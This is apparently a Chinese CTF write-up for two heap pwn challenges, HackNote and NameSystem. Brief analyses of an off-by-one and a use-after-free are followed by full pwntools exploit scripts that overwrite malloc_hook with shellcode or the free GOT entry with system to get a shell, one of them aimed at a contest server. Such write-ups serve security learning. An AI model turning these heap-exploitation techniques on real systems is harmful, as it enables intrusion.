湖湘杯复赛题目-writeup

还是要多刷多复现堆题啊

0x01 HackNodte

分析

这道题是静态链接，修改时用的是strlen,造成了off-by-one，所以堆重叠。然后把chunk分配到main_arena上，再修改unsortedbin,分配到malloc_hook上

exp

from pwn import *
sh = process('./HackNote')
gdb.attach(sh,'b*0x400BFD')

malloc_hook = 0x6CB788
free_hook = 0x6CD5E8

def add(size,content):
    sh.sendlineafter('-----------------\n','1')
    sh.sendlineafter(':\n',str(size))
    sh.sendafter(':\n',content)

def delete(idx):
    sh.sendlineafter('-----------------\n','2')
    sh.sendlineafter(':\n',str(idx))

def edit(idx,content):
    sh.sendlineafter('-----------------\n','3')
    sh.sendlineafter(':\n',str(idx))
    sh.sendafter(':\n',content)
context(os = 'linux',arch = 'amd64')

add(0x108, "a\n")#0
add(0x220, "b" * 0x1f0 + p64(0x200) + "\n")#1
add(0x100, "c\n")#2
add(0x100,'d\n')#3

edit(0,0x108*'a') 
delete(1)
edit(0,0x108*'a'+'\n')

add(0xe0,'a\n') #1
add(0x50,'b\n') #4
add(0x60,'c\n') #5

delete(1)
delete(2)

add(0x330,'a\n')  #1
delete(4)
delete(5)

edit(1,'e'*0xe8 + p64(0x60)+p64(0x71)+p64(0)*10+p64(0x71)+p64(0x6cb820)+'\n')

add(0x50,'c\n') #4   向main_arena中写入0x71
add(0x60,'d\n') #5    
add(0x60,p64(0) * 5 + p64(0x6CB788 - 0x10) + "\n" )#5   分配到main_arena并修改unsortedbin
add(0x60, p64(0x6cb790) + asm(shellcraft.sh()) + "\n")#5 向malloc_hook中写入shellcode
sh.sendlineafter('-----------------\n','1')
sh.sendlineafter(':\n','1')

sh.interactive()

0x02 NameSystem

这道题有个uaf一开始还真没看出来。。。。先把bss段上的一个堆指针改成got表上的内容，再把free的got表内容改成puts@plt，从而可以泄露libc，最后再把free@got改成system，然后执行就可以获得shell。

exp

from pwn import *

def add(size, content):
    r.sendline("1")
    r.sendlineafter("Name Size:", str(size))
    r.sendlineafter("Name:", content)
    r.recvuntil("Your choice :\n")

def dele(index):
    r.sendline("3")
    r.sendlineafter("The id you want to delete:", str(index))
    r.recvuntil("Your choice :\n")

#r = process("./NameSystem")
r = remote("183.129.189.62", "15505")
r.recvuntil("Your choice :\n")

for i in range(18):
    add(0x40, "a")


add(0x60, "a")
add(0x60, "a")

dele(0)
dele(18)
dele(17)
dele(19)
dele(0)

add(0x50, "a")
add(0x50, "a")

dele(0)
dele(18)
dele(17)
dele(19)
dele(0)

add(0x30, "a")
add(0x30, "a")

dele(0)
dele(18)
dele(17)
dele(19)
for i in range(13):
    dele(0)

add(0x60, p64(0x60208d))
add(0x60, p64(0))
add(0x60, "/bin/sh\x00")
add(0x60, "\x00" * 3 + p64(0x602060))

add(0x50, p64(0x601ffa))
add(0x50, p64(0))
add(0x50, "/bin/sh\x00")
add(0x50, "\x00" * 6 + p64(0x41) + p32(0x4006A0) + "\x00" * 3)

r.sendline("3")
r.sendlineafter("The id you want to delete:", str(0))

libc = u64(r.recvuntil("\n").ljust(8, "\x00")) + 0x7fb44b795000 - 0xa7fb44b7cbe80

add(0x30, p64(0x602008))
add(0x30, p64(0))
add(0x30, "/bin/sh\x00")
add(0x30, p64(libc + 0x45390)[:7])

r.sendline("3")
r.sendlineafter("The id you want to delete:", str(15))

#gdb.attach(r)
print "libc: " + hex(libc)

r.interactive()